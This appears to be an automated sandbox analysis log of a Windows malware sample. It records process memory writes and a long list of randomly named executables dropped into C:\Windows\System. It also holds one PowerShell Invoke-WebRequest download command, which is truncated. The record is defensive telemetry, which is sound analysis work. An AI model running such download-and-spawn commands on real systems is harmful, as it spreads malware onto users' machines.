PID 2740 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\nePTOUp.exe
PID 2740 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\nePTOUp.exe
PID 2740 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\nePTOUp.exe
PID 2740 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\WqdnKms.exe
PID 2740 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\WqdnKms.exe
PID 2740 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\WqdnKms.exe
PID 2740 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\mvkeQJk.exe
PID 2740 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\mvkeQJk.exe
PID 2740 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\mvkeQJk.exe
PID 2740 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\gDnRKdI.exe
PID 2740 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\gDnRKdI.exe
PID 2740 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\gDnRKdI.exe
PID 2740 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\jlBrfgi.exe
PID 2740 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\jlBrfgi.exe
PID 2740 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\jlBrfgi.exe
PID 2740 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\NMqzNUh.exe
PID 2740 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\NMqzNUh.exe
PID 2740 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\NMqzNUh.exe
PID 2740 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\tSWdktZ.exe
PID 2740 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\tSWdktZ.exe
PID 2740 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\tSWdktZ.exe
PID 2740 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\wnGMRUL.exe
PID 2740 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\wnGMRUL.exe
PID 2740 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\wnGMRUL.exe
PID 2740 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\bCeZwCM.exe
PID 2740 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\bCeZwCM.exe
PID 2740 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\bCeZwCM.exe
PID 2740 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\IrKNUgf.exe
PID 2740 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\IrKNUgf.exe
PID 2740 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\IrKNUgf.exe
PID 2740 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\tSMhgai.exe
PID 2740 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\tSMhgai.exe
PID 2740 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\tSMhgai.exe
PID 2740 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\IbfJoAi.exe
PID 2740 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\IbfJoAi.exe
PID 2740 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\IbfJoAi.exe
PID 2740 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\fjKnZXH.exe
PID 2740 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\fjKnZXH.exe
PID 2740 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\fjKnZXH.exe
PID 2740 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\qOkXlGW.exe
PID 2740 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\qOkXlGW.exe
PID 2740 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\qOkXlGW.exe
PID 2740 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\DVbxxSN.exe
PID 2740 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\DVbxxSN.exe
PID 2740 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\DVbxxSN.exe
PID 2740 wrote to memory of 308 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\NmbSPRS.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\WAuhOVQ.exe

C:\Windows\System\WAuhOVQ.exe

C:\Windows\System\rintTog.exe

C:\Windows\System\rintTog.exe

C:\Windows\System\mcMMfbL.exe

C:\Windows\System\mcMMfbL.exe

C:\Windows\System\mRjzGeY.exe

C:\Windows\System\mRjzGeY.exe

C:\Windows\System\lNneVmx.exe

C:\Windows\System\lNneVmx.exe

C:\Windows\System\nePTOUp.exe

C:\Windows\System\nePTOUp.exe

C:\Windows\System\WqdnKms.exe

C:\Windows\System\WqdnKms.exe

C:\Windows\System\mvkeQJk.exe

C:\Windows\System\mvkeQJk.exe

C:\Windows\System\gDnRKdI.exe

C:\Windows\System\gDnRKdI.exe

C:\Windows\System\jlBrfgi.exe

C:\Windows\System\jlBrfgi.exe

C:\Windows\System\NMqzNUh.exe

C:\Windows\System\NMqzNUh.exe

C:\Windows\System\tSWdktZ.exe

C:\Windows\System\tSWdktZ.exe

C:\Windows\System\wnGMRUL.exe

C:\Windows\System\wnGMRUL.exe

C:\Windows\System\bCeZwCM.exe

C:\Windows\System\bCeZwCM.exe

C:\Windows\System\IrKNUgf.exe

C:\Windows\System\IrKNUgf.exe

C:\Windows\System\tSMhgai.exe

C:\Windows\System\tSMhgai.exe

C:\Windows\System\IbfJoAi.exe

C:\Windows\System\IbfJoAi.exe

C:\Windows\System\fjKnZXH.exe

C:\Windows\System\fjKnZXH.exe

C:\Windows\System\qOkXlGW.exe

C:\Windows\System\qOkXlGW.exe

C:\Windows\System\DVbxxSN.exe

C:\Windows\System\DVbxxSN.exe

C:\Windows\System\NmbSPRS.exe

C:\Windows\System\NmbSPRS.exe

C:\Windows\System\vacYWcB.exe

C:\Windows\System\vacYWcB.exe

C:\Windows\System\kfdPmuM.exe

C:\Windows\System\kfdPmuM.exe

C:\Windows\System\BkAAeHt.exe

C:\Windows\System\BkAAeHt.exe

C:\Windows\System\JEhxEtO.exe

C:\Windows\System\JEhxEtO.exe

C:\Windows\System\AErWwdQ.exe

C:\Windows\System\AErWwdQ.exe

C:\Windows\System\vXLthvm.exe

C:\Windows\System\vXLthvm.exe

C:\Windows\System\sSnOXqD.exe

C:\Windows\System\sSnOXqD.exe

C:\Windows\System\fahgDuQ.exe

C:\Windows\System\fahgDuQ.exe

C:\Windows\System\HLarVWJ.exe

C:\Windows\System\HLarVWJ.exe

C:\Windows\System\AxjuPwF.exe

C:\Windows\System\AxjuPwF.exe

C:\Windows\System\VMfmXYJ.exe

C:\Windows\System\VMfmXYJ.exe

C:\Windows\System\fGuWooB.exe

C:\Windows\System\fGuWooB.exe

C:\Windows\System\WVhKUyE.exe

C:\Windows\System\WVhKUyE.exe

C:\Windows\System\cAbznPB.exe

C:\Windows\System\cAbznPB.exe

C:\Windows\System\gAgjZLh.exe

C:\Windows\System\gAgjZLh.exe

C:\Windows\System\MPkidev.exe

C:\Windows\System\MPkidev.exe

C:\Windows\System\rqydzbQ.exe

C:\Windows\System\rqydzbQ.exe

C:\Windows\System\diHoRwC.exe

C:\Windows\System\diHoRwC.exe

C:\Windows\System\VTvmsCL.exe

C:\Windows\System\VTvmsCL.exe

C:\Windows\System\mDycrsk.exe

C:\Windows\System\mDycrsk.exe

C:\Windows\System\mhyjQLP.exe

C:\Windows\System\mhyjQLP.exe

C:\Windows\System\hzxiAwF.exe

C:\Windows\System\hzxiAwF.exe

C:\Windows\System\GySxMVp.exe

C:\Windows\System\GySxMVp.exe

C:\Windows\System\xmmOQGq.exe

C:\Windows\System\xmmOQGq.exe

C:\Windows\System\OmhZidH.exe

C:\Windows\System\OmhZidH.exe

C:\Windows\System\WLMLFgG.exe

C:\Windows\System\WLMLFgG.exe

C:\Windows\System\jqiGgcv.exe

C:\Windows\System\jqiGgcv.exe

C:\Windows\System\KKuckpm.exe

C:\Windows\System\KKuckpm.exe

C:\Windows\System\VpfYPxT.exe

C:\Windows\System\VpfYPxT.exe

C:\Windows\System\UmgwDbx.exe

C:\Windows\System\UmgwDbx.exe

C:\Windows\System\XPskEDu.exe

C:\Windows\System\XPskEDu.exe

C:\Windows\System\UexTSIq.exe

C:\Windows\System\UexTSIq.exe

C:\Windows\System\IfSwFqX.exe

C:\Windows\System\IfSwFqX.exe

C:\Windows\System\iKlqifc.exe

C:\Windows\System\iKlqifc.exe

C:\Windows\System\nzWRbAk.exe

C:\Windows\System\nzWRbAk.exe

C:\Windows\System\xMkAVui.exe

C:\Windows\System\xMkAVui.exe

C:\Windows\System\KxIFHGp.exe

C:\Windows\System\KxIFHGp.exe

C:\Windows\System\ZvJCJxS.exe

C:\Windows\System\ZvJCJxS.exe

C:\Windows\System\SOnOQLb.exe

C:\Windows\System\SOnOQLb.exe

C:\Windows\System\vwZmzEL.exe

C:\Windows\System\vwZmzEL.exe

C:\Windows\System\NOzGkxb.exe

C:\Windows\System\NOzGkxb.exe

C:\Windows\System\eydGKvI.exe

C:\Windows\System\eydGKvI.exe

C:\Windows\System\IyviKRT.exe

C:\Windows\System\IyviKRT.exe

C:\Windows\System\AwSTYJx.exe

C:\Windows\System\AwSTYJx.exe

C:\Windows\System\nwXOowc.exe

C:\Windows\System\nwXOowc.exe

C:\Windows\System\kijVnNs.exe

C:\Windows\System\kijVnNs.exe

C:\Windows\System\FsJMfuO.exe

C:\Windows\System\FsJMfuO.exe

C:\Windows\System\lubIHqS.exe

C:\Windows\System\lubIHqS.exe

C:\Windows\System\uFwcSdP.exe

C:\Windows\System\uFwcSdP.exe

C:\Windows\System\ViIMhvA.exe

C:\Windows\System\ViIMhvA.exe

C:\Windows\System\NgEHuWF.exe

C:\Windows\System\NgEHuWF.exe

C:\Windows\System\UDOtwzt.exe

C:\Windows\System\UDOtwzt.exe

C:\Windows\System\kdolvUN.exe

C:\Windows\System\kdolvUN.exe

C:\Windows\System\uDPuZwA.exe

C:\Windows\System\uDPuZwA.exe

C:\Windows\System\UwNUjGJ.exe

C:\Windows\System\UwNUjGJ.exe

C:\Windows\System\xgmGiYn.exe

C:\Windows\System\xgmGiYn.exe

C:\Windows\System\sQBvYvc.exe

C:\Windows\System\sQBvYvc.exe

C:\Windows\System\YRNTSxX.exe

C:\Windows\System\YRNTSxX.exe

C:\Windows\System\pWaGwcS.exe

C:\Windows\System\pWaGwcS.exe

C:\Windows\System\VrcARcd.exe

C:\Windows\System\VrcARcd.exe

C:\Windows\System\cEXbOpl.exe

C:\Windows\System\cEXbOpl.exe

C:\Windows\System\aCfyTTE.exe

C:\Windows\System\aCfyTTE.exe

C:\Windows\System\vmIyIou.exe

C:\Windows\System\vmIyIou.exe

C:\Windows\System\MWzLhJr.exe

C:\Windows\System\MWzLhJr.exe

C:\Windows\System\tiKSOUU.exe

C:\Windows\System\tiKSOUU.exe

C:\Windows\System\YtivOnJ.exe

C:\Windows\System\YtivOnJ.exe

C:\Windows\System\IosJwGw.exe

C:\Windows\System\IosJwGw.exe

C:\Windows\System\OuSDMEt.exe

C:\Windows\System\OuSDMEt.exe

C:\Windows\System\LMBJdYC.exe

C:\Windows\System\LMBJdYC.exe

C:\Windows\System\YfiTWqE.exe

C:\Windows\System\YfiTWqE.exe

C:\Windows\System\jSnvcMs.exe

C:\Windows\System\jSnvcMs.exe

C:\Windows\System\Ymqdtha.exe

C:\Windows\System\Ymqdtha.exe

C:\Windows\System\IzHfNAs.exe

C:\Windows\System\IzHfNAs.exe

C:\Windows\System\TEUBYkH.exe

C:\Windows\System\TEUBYkH.exe

C:\Windows\System\gWyZPSe.exe

C:\Windows\System\gWyZPSe.exe

C:\Windows\System\WVisjNa.exe

C:\Windows\System\WVisjNa.exe

C:\Windows\System\IsZMIIB.exe

C:\Windows\System\IsZMIIB.exe

C:\Windows\System\AnsGufx.exe

C:\Windows\System\AnsGufx.exe

C:\Windows\System\QbihdMk.exe

C:\Windows\System\QbihdMk.exe

C:\Windows\System\wXqfoKM.exe

C:\Windows\System\wXqfoKM.exe

C:\Windows\System\DxTrERn.exe

C:\Windows\System\DxTrERn.exe

C:\Windows\System\zkLALsd.exe

C:\Windows\System\zkLALsd.exe

C:\Windows\System\LhThyda.exe

C:\Windows\System\LhThyda.exe

C:\Windows\System\WlDDZBD.exe

C:\Windows\System\WlDDZBD.exe

C:\Windows\System\fIYAmiK.exe

C:\Windows\System\fIYAmiK.exe

C:\Windows\System\FdczWUb.exe

C:\Windows\System\FdczWUb.exe

C:\Windows\System\QOXPIYE.exe

C:\Windows\System\QOXPIYE.exe

C:\Windows\System\JtyVYMx.exe

C:\Windows\System\JtyVYMx.exe

C:\Windows\System\avqemKH.exe

C:\Windows\System\avqemKH.exe

C:\Windows\System\utoNcqv.exe

C:\Windows\System\utoNcqv.exe

C:\Windows\System\YVHVaan.exe

C:\Windows\System\YVHVaan.exe

C:\Windows\System\RbvPwjN.exe

C:\Windows\System\RbvPwjN.exe

C:\Windows\System\IwZikZP.exe

C:\Windows\System\IwZikZP.exe

C:\Windows\System\eesgZbp.exe

C:\Windows\System\eesgZbp.exe

C:\Windows\System\BMJmCBp.exe

C:\Windows\System\BMJmCBp.exe

C:\Windows\System\fRzfspv.exe

C:\Windows\System\fRzfspv.exe

C:\Windows\System\gPzrDXQ.exe

C:\Windows\System\gPzrDXQ.exe

C:\Windows\System\FCrhqjE.exe

C:\Windows\System\FCrhqjE.exe

C:\Windows\System\VkXkRtp.exe

C:\Windows\System\VkXkRtp.exe

C:\Windows\System\RYHpsDr.exe

C:\Windows\System\RYHpsDr.exe

C:\Windows\System\pUcDSRf.exe

C:\Windows\System\pUcDSRf.exe

C:\Windows\System\DykpwgE.exe

C:\Windows\System\DykpwgE.exe

C:\Windows\System\dwBWdnk.exe

C:\Windows\System\dwBWdnk.exe

C:\Windows\System\rxudQVE.exe

C:\Windows\System\rxudQVE.exe

C:\Windows\System\xUisJaB.exe

C:\Windows\System\xUisJaB.exe

C:\Windows\System\OCeNugL.exe

C:\Windows\System\OCeNugL.exe

C:\Windows\System\DTtJjkM.exe

C:\Windows\System\DTtJjkM.exe

C:\Windows\System\EHBaKUA.exe

C:\Windows\System\EHBaKUA.exe

C:\Windows\System\hAYxExQ.exe

C:\Windows\System\hAYxExQ.exe

C:\Windows\System\vfxBBqy.exe

C:\Windows\System\vfxBBqy.exe

C:\Windows\System\uqnHdky.exe

C:\Windows\System\uqnHdky.exe

C:\Windows\System\eNYwzla.exe

C:\Windows\System\eNYwzla.exe

C:\Windows\System\PYFqygP.exe

C:\Windows\System\PYFqygP.exe

C:\Windows\System\GGqPEix.exe

C:\Windows\System\GGqPEix.exe

C:\Windows\System\eXlUfwB.exe

C:\Windows\System\eXlUfwB.exe

C:\Windows\System\nHsevbr.exe

C:\Windows\System\nHsevbr.exe

C:\Windows\System\muNKBLh.exe

C:\Windows\System\muNKBLh.exe

C:\Windows\System\jNhjUcv.exe

C:\Windows\System\jNhjUcv.exe

C:\Windows\System\angVDZe.exe

C:\Windows\System\angVDZe.exe

C:\Windows\System\TbTPyRX.exe

C:\Windows\System\TbTPyRX.exe

C:\Windows\System\zukiwrP.exe

C:\Windows\System\zukiwrP.exe

C:\Windows\System\qjgaArm.exe

C:\Windows\System\qjgaArm.exe

C:\Windows\System\anSJXuO.exe

C:\Windows\System\anSJXuO.exe

C:\Windows\System\ZsoUrKt.exe

C:\Windows\System\ZsoUrKt.exe

C:\Windows\System\tQKyHEn.exe

C:\Windows\System\tQKyHEn.exe

C:\Windows\System\XoQsERN.exe

C:\Windows\System\XoQsERN.exe

C:\Windows\System\KsUIkDC.exe

C:\Windows\System\KsUIkDC.exe

C:\Windows\System\jTlahKM.exe

C:\Windows\System\jTlahKM.exe

C:\Windows\System\jeXOuPu.exe

C:\Windows\System\jeXOuPu.exe

C:\Windows\System\uzqUCTd.exe

C:\Windows\System\uzqUCTd.exe

C:\Windows\System\ZOLlaWv.exe

C:\Windows\System\ZOLlaWv.exe

C:\Windows\System\KAiubsB.exe

C:\Windows\System\KAiubsB.exe

C:\Windows\System\GuQjiGc.exe

C:\Windows\System\GuQjiGc.exe

C:\Windows\System\SNHZzBt.exe

C:\Windows\System\SNHZzBt.exe

C:\Windows\System\GfISOrc.exe

C:\Windows\System\GfISOrc.exe

C:\Windows\System\WFJuFYo.exe

C:\Windows\System\WFJuFYo.exe

C:\Windows\System\gwsdvht.exe

C:\Windows\System\gwsdvht.exe

C:\Windows\System\ccEFOmH.exe

C:\Windows\System\ccEFOmH.exe

C:\Windows\System\ASLbWxv.exe

C:\Windows\System\ASLbWxv.exe

C:\Windows\System\MZRAglm.exe

C:\Windows\System\MZRAglm.exe

C:\Windows\System\UNQprrb.exe

C:\Windows\System\UNQprrb.exe

C:\Windows\System\tpGLUHo.exe

C:\Windows\System\tpGLUHo.exe

C:\Windows\System\LOsoxip.exe

C:\Windows\System\LOsoxip.exe

C:\Windows\System\lNmLFhT.exe

C:\Windows\System\lNmLFhT.exe

C:\Windows\System\mkbNXSY.exe

C:\Windows\System\mkbNXSY.exe

C:\Windows\System\gvDlrmY.exe

C:\Windows\System\gvDlrmY.exe

C:\Windows\System\GldfNhY.exe

C:\Windows\System\GldfNhY.exe

C:\Windows\System\MzTHRYA.exe

C:\Windows\System\MzTHRYA.exe

C:\Windows\System\iYbwSml.exe

C:\Windows\System\iYbwSml.exe

C:\Windows\System\DGNYmce.exe

C:\Windows\System\DGNYmce.exe

C:\Windows\System\Nfnuhez.exe

C:\Windows\System\Nfnuhez.exe

C:\Windows\System\xVIkTvr.exe

C:\Windows\System\xVIkTvr.exe

C:\Windows\System\ATisiMc.exe

C:\Windows\System\ATisiMc.exe

C:\Windows\System\WwnJYFb.exe

C:\Windows\System\WwnJYFb.exe

C:\Windows\System\sGCEWsW.exe

C:\Windows\System\sGCEWsW.exe

C:\Windows\System\OsTcUqi.exe

C:\Windows\System\OsTcUqi.exe

C:\Windows\System\LRdCHeK.exe

C:\Windows\System\LRdCHeK.exe

C:\Windows\System\tZekZLw.exe

C:\Windows\System\tZekZLw.exe

C:\Windows\System\JqugcpB.exe

C:\Windows\System\JqugcpB.exe

C:\Windows\System\jecuChL.exe

C:\Windows\System\jecuChL.exe

C:\Windows\System\SPdGWDC.exe

C:\Windows\System\SPdGWDC.exe

C:\Windows\System\PuNwemr.exe

C:\Windows\System\PuNwemr.exe

C:\Windows\System\cXjmiLl.exe

C:\Windows\System\cXjmiLl.exe

C:\Windows\System\MYJLxTv.exe

C:\Windows\System\MYJLxTv.exe

C:\Windows\System\xZzoUTB.exe

C:\Windows\System\xZzoUTB.exe

C:\Windows\System\qbzSyPh.exe

C:\Windows\System\qbzSyPh.exe

C:\Windows\System\SarrGiK.exe

C:\Windows\System\SarrGiK.exe

C:\Windows\System\TlibMWr.exe

C:\Windows\System\TlibMWr.exe

C:\Windows\System\AyEIuhI.exe

C:\Windows\System\AyEIuhI.exe

C:\Windows\System\FtOySng.exe

C:\Windows\System\FtOySng.exe

C:\Windows\System\rLoDPXN.exe

C:\Windows\System\rLoDPXN.exe

C:\Windows\System\zzQegdE.exe

C:\Windows\System\zzQegdE.exe

C:\Windows\System\meznuan.exe

C:\Windows\System\meznuan.exe

C:\Windows\System\eBokSwn.exe

C:\Windows\System\eBokSwn.exe

C:\Windows\System\ClcqMgU.exe

C:\Windows\System\ClcqMgU.exe

C:\Windows\System\PDbUCtN.exe

C:\Windows\System\PDbUCtN.exe

C:\Windows\System\TLZdPeZ.exe

C:\Windows\System\TLZdPeZ.exe

C:\Windows\System\GOjSMQn.exe

C:\Windows\System\GOjSMQn.exe

C:\Windows\System\fvsTiVy.exe

C:\Windows\System\fvsTiVy.exe

C:\Windows\System\AQKsexb.exe

C:\Windows\System\AQKsexb.exe

C:\Windows\System\pCTebfL.exe

C:\Windows\System\pCTebfL.exe

C:\Windows\System\VopDmQR.exe

C:\Windows\System\VopDmQR.exe

C:\Windows\System\SRxOctl.exe

C:\Windows\System\SRxOctl.exe

C:\Windows\System\GheHUuf.exe

C:\Windows\System\GheHUuf.exe

C:\Windows\System\dBeGkBT.exe

C:\Windows\System\dBeGkBT.exe

C:\Windows\System\KanieAO.exe

C:\Windows\System\KanieAO.exe

C:\Windows\System\rHAYJIx.exe

C:\Windows\System\rHAYJIx.exe

C:\Windows\System\QhjKeyf.exe

C:\Windows\System\QhjKeyf.exe

C:\Windows\System\XOiwmDc.exe

C:\Windows\System\XOiwmDc.exe

C:\Windows\System\RouZgjC.exe

C:\Windows\System\RouZgjC.exe

C:\Windows\System\QuZLJwr.exe

C:\Windows\System\QuZLJwr.exe

C:\Windows\System\crkFHzh.exe

C:\Windows\System\crkFHzh.exe

C:\Windows\System\aeEybsc.exe

C:\Windows\System\aeEybsc.exe

C:\Windows\System\ruRKvZy.exe

C:\Windows\System\ruRKvZy.exe

C:\Windows\System\KrzZSFl.exe

C:\Windows\System\KrzZSFl.exe

C:\Windows\System\IuSjgbk.exe

C:\Windows\System\IuSjgbk.exe

C:\Windows\System\tilPFti.exe

C:\Windows\System\tilPFti.exe

C:\Windows\System\ZNNzeIi.exe

C:\Windows\System\ZNNzeIi.exe

C:\Windows\System\DDEyIoV.exe

C:\Windows\System\DDEyIoV.exe

C:\Windows\System\VqRdhXS.exe

C:\Windows\System\VqRdhXS.exe

C:\Windows\System\GggLUnz.exe

C:\Windows\System\GggLUnz.exe

C:\Windows\System\NTvPJut.exe

C:\Windows\System\NTvPJut.exe

C:\Windows\System\QVxsHIX.exe

C:\Windows\System\QVxsHIX.exe

C:\Windows\System\wFvwkLj.exe

C:\Windows\System\wFvwkLj.exe

C:\Windows\System\cRnxNec.exe

C:\Windows\System\cRnxNec.exe

C:\Windows\System\TwKIozK.exe

C:\Windows\System\TwKIozK.exe

C:\Windows\System\ZAFNSrI.exe

C:\Windows\System\ZAFNSrI.exe

C:\Windows\System\aOwvyFX.exe

C:\Windows\System\aOwvyFX.exe

C:\Windows\System\cDHUeEu.exe

C:\Windows\System\cDHUeEu.exe

C:\Windows\System\TRSnXre.exe

C:\Windows\System\TRSnXre.exe

C:\Windows\System\tnEIYtW.exe

C:\Windows\System\tnEIYtW.exe

C:\Windows\System\FVrwkWn.exe

C:\Windows\System\FVrwkWn.exe

C:\Windows\System\pXFUERI.exe

C:\Windows\System\pXFUERI.exe

C:\Windows\System\BkYUApE.exe

C:\Windows\System\BkYUApE.exe

C:\Windows\System\pPDCWyl.exe

C:\Windows\System\pPDCWyl.exe

C:\Windows\System\WPMVhuU.exe

C:\Windows\System\WPMVhuU.exe

C:\Windows\System\ZbyKfJX.exe

C:\Windows\System\ZbyKfJX.exe

C:\Windows\System\AeqlRXU.exe

C:\Windows\System\AeqlRXU.exe

C:\Windows\System\SNnWViW.exe

C:\Windows\System\SNnWViW.exe

C:\Windows\System\alOylfZ.exe

C:\Windows\System\alOylfZ.exe

C:\Windows\System\YneKVvl.exe

C:\Windows\System\YneKVvl.exe

C:\Windows\System\FCxqwTu.exe

C:\Windows\System\FCxqwTu.exe

C:\Windows\System\kwOUboH.exe

C:\Windows\System\kwOUboH.exe

C:\Windows\System\IUSsWGg.exe

C:\Windows\System\IUSsWGg.exe

C:\Windows\System\vbOnFha.exe

C:\Windows\System\vbOnFha.exe

C:\Windows\System\XuikrXD.exe

C:\Windows\System\XuikrXD.exe

C:\Windows\System\fZEeRpV.exe

C:\Windows\System\fZEeRpV.exe

C:\Windows\System\toXOadc.exe

C:\Windows\System\toXOadc.exe

C:\Windows\System\VxuxAef.exe

C:\Windows\System\VxuxAef.exe

C:\Windows\System\FyIznuq.exe

C:\Windows\System\FyIznuq.exe

C:\Windows\System\bNBqxaW.exe

C:\Windows\System\bNBqxaW.exe

C:\Windows\System\IvPNTvX.exe

C:\Windows\System\IvPNTvX.exe

C:\Windows\System\eZayUWV.exe

C:\Windows\System\eZayUWV.exe

C:\Windows\System\vJJUjcm.exe

C:\Windows\System\vJJUjcm.exe

C:\Windows\System\sQtcumN.exe

C:\Windows\System\sQtcumN.exe

C:\Windows\System\sTWbwfm.exe

C:\Windows\System\sTWbwfm.exe

C:\Windows\System\NuopHfB.exe

C:\Windows\System\NuopHfB.exe

C:\Windows\System\qGdzKWL.exe

C:\Windows\System\qGdzKWL.exe

C:\Windows\System\VElXrSg.exe

C:\Windows\System\VElXrSg.exe

C:\Windows\System\MGgXcZg.exe

C:\Windows\System\MGgXcZg.exe

C:\Windows\System\WORZwFc.exe

C:\Windows\System\WORZwFc.exe

C:\Windows\System\BnNrsjE.exe

C:\Windows\System\BnNrsjE.exe

C:\Windows\System\QXwpcTK.exe

C:\Windows\System\QXwpcTK.exe

C:\Windows\System\UgUQmiI.exe

C:\Windows\System\UgUQmiI.exe

C:\Windows\System\coMVPOu.exe

C:\Windows\System\coMVPOu.exe

C:\Windows\System\jiPHWFi.exe

C:\Windows\System\jiPHWFi.exe

C:\Windows\System\NQnFOsZ.exe

C:\Windows\System\NQnFOsZ.exe

C:\Windows\System\JwSquHW.exe

C:\Windows\System\JwSquHW.exe

C:\Windows\System\RPsINts.exe

C:\Windows\System\RPsINts.exe

C:\Windows\System\yZyDhvw.exe

